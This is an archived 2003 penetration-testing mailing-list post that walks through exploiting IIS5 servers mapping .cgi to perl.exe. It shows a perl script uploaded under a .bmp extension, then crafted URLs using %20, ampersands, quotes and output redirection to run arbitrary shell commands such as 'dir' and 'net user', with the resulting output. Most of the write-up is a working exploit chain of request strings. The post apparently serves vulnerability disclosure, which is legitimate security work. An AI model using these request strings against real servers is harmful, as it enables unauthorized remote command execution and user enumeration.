Penetration Testing mailing list archives
The Building Of An Exploit String
From: "Brett Moore" <brett () softwarecreations co nz>
Date: Thu, 27 Feb 2003 15:01:04 +1300
********************************************* The Building Of An Exploit String - Exploiting The PERL Under IIS ********************************************* PERL v5.6.1 built for MSWin32-x86 *http://www.perl.com/ *http://www.activestate.com The problems highlighted in this writeup are not directly related to the use of perl but highlight some of the possibilities when problems with file uploading and directory permissions are abused. It is highly possible that these techniques could be used against other command line interpreters. I recently audited a package that used the perl.exe interpreter on a windows 2000 server running IIS5. Under application configuration in the IIS management console, the .cgi extension is mapped as: c:/APP/perl/bin/perl.exe %s This allows us access to the perl executable through the use of a cgi extension. example: *http://192.168.1.1/web/test.cgi returns: Can't open perl script "C:\APP\web\test.cgi": No such file or directory This is obviously a path disclosure issue. All attempts to pass parameters to perl.exe fail. example: *http://192.168.1.1/web/-h.cgi result: Can't open perl script "C:\APP\web\-h.cgi": No such file or directory It seems that IIS is passing the full path to the interpreter. So what we required was the ability to create a file on the server and then pass that file to the perl interpreter. This particular application allowed uploading of files with a .bmp extension so we created a small perl script system(@ARGV); and uploaded it as system.bmp. This file was uploaded to the folder c:/APP/web/data/ IIS will only pass the file to the perl interpreter if it has a cgi extension, which our uploaded file doesn't have. example: *http://192.168.1.1/web/data/system.bmp.cgi result: Can't open perl script "C:\APP\web\data\system.bmp.cgi": No such file or directory By placing a %20 (space) or %09 (tab) between the .bmp and the .cgi we are able to force the interpreter to execute our script. example: *http://192.168.1.1/web/data/system.bmp%20.cgi result: '.cgi' is not recognized as an internal or external command, operable program or batch file. The system command inside our uploaded file is executing and using the .cgi as the argv parameter. Any arguments placed before the %20.cgi will be used by our system call. example: *http://192.168.1.1/web/data/system.bmp%20dir%20.cgi result: This will result in a request to open or save to disk Appending a ? to the end of the url will prevent the open/save to disk request. example: *http://192.168.1.1/web/data/system.bmp%20dir%20.cgi? result: Directory of C:\APP\web File Not Found This results in a File Not Found message because our script is running system("dir .cgi?") This is easily avoided by inserting an & (ampersand) character after the last argument and before the %20.cgi example: *http://192.168.1.1/web/data/system.bmp%20dir%20&%20.cgi? result: Directory of C:\APP\web 02/12/2003 09:21a <DIR> . 02/12/2003 09:21a <DIR> .. 02/12/2003 01:35a 15 a.pl 02/12/2003 12:36a <DIR> bin 02/12/2003 12:36a 206 default.htm etc.. 10 File(s) 17,165 bytes 6 Dir(s) 52,390,678,528 bytes free '.cgi' is not recognized as an internal or external command, operable program or batch file. Which will now run as system("dir & .cgi?") which are interpreted by cmd.exe as two seperate dos commands. This will not work when attempting to run executable files. example: *http://192.168.1.1/web/data/system.bmp%20net%20user%20&%20%20.cgi? result: More help is available by typing NET HELPMSG 2221. example: *http://192.168.1.1/web/data/system.bmp%20net%20use%20&%20%20.cgi? result: The network name cannot be found. This is caused by cmd.exe interpreting the 'user & .cgi' part of the string as the parameter to pass to 'net.exe'. This results in a call to "net user & .cgi" which is invalid. By placing " (double quotes) around our net.exe call we can modify the way that cmd.exe will interpret the string. example: *http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20%20.cgi? result: ------------------------------------------------------------ Administrator Guest IUSR_BLACKHOLE IWAM_BLACKHOLE NetShowServices TsInternetUser VUSR_BLACKHOLE The command completed with one or more errors. '.cgi' is not recognized as an internal or external command, operable program or batch file. The '.cgi' error is still been shown here as it is still been interpreted. By adding a final command and redirecting its output to a writable file space we can have this error removed. example: *http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20dir%20>%20\a.cg i? result: ------------------------------------------------------------ Administrator Guest IUSR_BLACKHOLE IWAM_BLACKHOLE NetShowServices TsInternetUser VUSR_BLACKHOLE The command completed with one or more errors. .. ---------------------------------------------------------------------------- <Pre>Do you know the base address of the Global Offset Table (GOT) on a Solaris 8 box? CORE IMPACT does.</Pre> <A href="http://www.securityfocus.com/core"> http://www.securityfocus.com/core</A>
Current thread:
- The Building Of An Exploit String Brett Moore (Feb 27)